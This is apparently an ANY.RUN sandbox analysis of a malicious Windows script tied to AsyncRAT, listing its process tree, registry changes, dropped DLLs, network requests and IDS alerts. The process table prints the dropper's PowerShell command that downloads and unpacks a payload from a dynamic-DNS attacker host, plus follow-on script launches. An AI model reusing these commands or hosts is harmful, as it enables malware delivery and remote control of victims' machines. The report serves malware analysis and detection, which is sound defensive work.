File name: | StatementNumber#vfnwfrsysl.wsf |
Full analysis: | https://app.any.run/tasks/24494137-79d6-47f1-ab50-16844ecab24b |
Verdict: | Malicious activity |
Threats: | AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions. |
Analysis date: | February 12, 2024, 17:26:15 |
OS: | Windows 10 Professional (build: 19044, 64 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | Unicode text, UTF-8 text, with very long lines (4923) |
MD5: | 41895B624BC77C2921E6E1BEBE1B6CED |
SHA1: | E920FB9EC50C2EC43591BD2D8C99B6E6D70270B5 |
SHA256: | C5C76A901DFE2FE33A01F3D1E3B3F82C99A5B0E4898E1B78B76AC6E7A48E5419 |
SSDEEP: | 384:UIvIvIvIvIvIvIvIvIvIvIvIgIvIvIvIvIvIvIvIvIvIvIvIrIvIvIvIvIvIvIvr:Q |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5924 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\Desktop\StatementNumber#vfnwfrsysl.wsf" | C:\Windows\System32\wscript.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
3888 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://newhost.dyndns.info/f.jpg' -Destination 'C:\Users\Public\ben.zip';Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5808 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
4540 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\Public\basta.vbs" | C:\Windows\System32\wscript.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
504 | "C:\Windows\System32\net.exe" session | C:\Windows\System32\net.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
848 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | net.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
3928 | C:\WINDOWS\system32\net1 session | C:\Windows\System32\net1.exe | — | net.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 10.0.19041.844 (WinBuild.160101.0800) Modules
| |||||||||||||||
1040 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\Public\node.bat" " | C:\Windows\System32\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
3116 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5928 | PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
|
(PID) Process: | (5924) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (5924) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (5924) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (5924) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (5924) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
Operation: | write | Name: | CachePrefix |
Value: | |||
(PID) Process: | (5924) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
(PID) Process: | (5924) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
(PID) Process: | (3888) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (3888) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (3888) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3888 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_are4b00l.adn.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
3888 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_aow4hdg3.xxx.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
3888 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_l1ylofaa.rug.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
5924 | wscript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\D9H4GX35\g4[1].txt | text | |
MD5:8471B9F9D9E51433F25D31823A43A59C | SHA256:14B1DD86E80AD1148017CDA4DCDAF6CD03CC3487722FA1EE1C36C4B54AC425B1 | |||
3888 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ecocbi04.mox.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
3888 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_04hjhqen.haw.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
3888 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uluwfezl.rok.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
3888 | powershell.exe | C:\Users\Public\method.dll | text | |
MD5:38B97710070DBDD7B3359C0D52DA4A72 | SHA256:675F06AF4E7F254D55AC605BBD7DA45D9E00207A97F8A8AB7BB747D512776BC7 | |||
3888 | powershell.exe | C:\Users\Public\msg.dll | text | |
MD5:A4BFB12DBF9DA83178AE54E82BA3A432 | SHA256:27D5BD8CB077905BE7AB576F344C27F140B5585EF471F68638A8791C07FDA0CE | |||
3888 | powershell.exe | C:\Users\Public\load.dll | text | |
MD5:F19DBF2EDB3A0BD74B0524D960FF21EB | SHA256:8A6BDB6B18DA586FE7F2ACBD8F1055533F2CD97A3681B3652BCD712224DF45C3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2420 | svchost.exe | GET | 200 | 37.1.214.209:80 | http://newhost.dyndns.info/f.jpg | unknown | compressed | 223 Kb | unknown |
5924 | wscript.exe | GET | 200 | 37.1.214.209:80 | http://37.1.214.209/g4.txt | unknown | text | 546 b | unknown |
2420 | svchost.exe | HEAD | 200 | 37.1.214.209:80 | http://newhost.dyndns.info/f.jpg | unknown | — | — | unknown |
5476 | msedge.exe | GET | 200 | 37.1.214.209:80 | http://newhost.dyndns.info/f.jpg | unknown | compressed | 223 Kb | unknown |
5476 | msedge.exe | GET | 204 | 13.107.6.158:80 | http://edge-http.microsoft.com/captiveportal/generate_204 | unknown | — | — | unknown |
6244 | curl.exe | GET | 200 | 37.1.214.209:80 | http://newhost.dyndns.info/f.jpg | unknown | compressed | 223 Kb | unknown |
5476 | msedge.exe | GET | 200 | 37.1.214.209:80 | http://newhost.dyndns.info/favicon.ico | unknown | image | 30.1 Kb | unknown |
4128 | CompatTelRunner.exe | GET | 200 | 2.18.97.123:80 | http://www.microsoft.com/pkiops/crl/MicWinProPCA2011_2011-10-19.crl | unknown | binary | 564 b | unknown |
2592 | wermgr.exe | GET | 200 | 2.16.241.12:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | binary | 1.01 Kb | unknown |
4128 | CompatTelRunner.exe | GET | 200 | 88.221.110.114:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | binary | 824 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5924 | wscript.exe | 37.1.214.209:80 | newhost.dyndns.info | HVC-AS | US | unknown |
2592 | wermgr.exe | 52.182.143.212:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
2592 | wermgr.exe | 2.16.241.12:80 | crl.microsoft.com | Akamai International B.V. | DE | unknown |
3012 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
2592 | wermgr.exe | 23.218.209.163:80 | www.microsoft.com | AKAMAI-AS | DE | unknown |
2592 | wermgr.exe | 20.189.173.20:443 | umwatson.events.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
2420 | svchost.exe | 37.1.214.209:80 | newhost.dyndns.info | HVC-AS | US | unknown |
2420 | svchost.exe | 104.20.23.46:443 | nodejs.org | CLOUDFLARENET | — | shared |
2592 | wermgr.exe | 20.42.65.92:443 | umwatson.events.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
Domain | IP | Reputation |
---|---|---|
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
umwatson.events.data.microsoft.com |
| whitelisted |
newhost.dyndns.info |
| unknown |
nodejs.org |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
ntp.msn.com |
| whitelisted |
config.edge.skype.com |
| whitelisted |
edge-http.microsoft.com |
| whitelisted |
edge.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
5924 | wscript.exe | A Network Trojan was detected | SUSPICIOUS [ANY.RUN] VBS is used to run Shell |
— | — | Potentially Bad Traffic | ET INFO DYNAMIC_DNS Query to a *.dyndns .info Domain |
— | — | Misc activity | AV INFO DYNAMIC_DNS Query to *.dyndns. Domain |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.dyndns. Domain |
2420 | svchost.exe | Misc activity | ET INFO DYNAMIC_DNS HTTP Request to a *.dyndns.* domain |
2420 | svchost.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS HTTP Request to a *.dyndns .info Domain |
2420 | svchost.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS HTTP Request to a *.dyndns .info Domain |
2420 | svchost.exe | Misc activity | ET INFO DYNAMIC_DNS HTTP Request to a *.dyndns.* domain |
— | — | Potentially Bad Traffic | ET INFO DYNAMIC_DNS Query to a *.dyndns .info Domain |
— | — | Misc activity | AV INFO DYNAMIC_DNS Query to *.dyndns. Domain |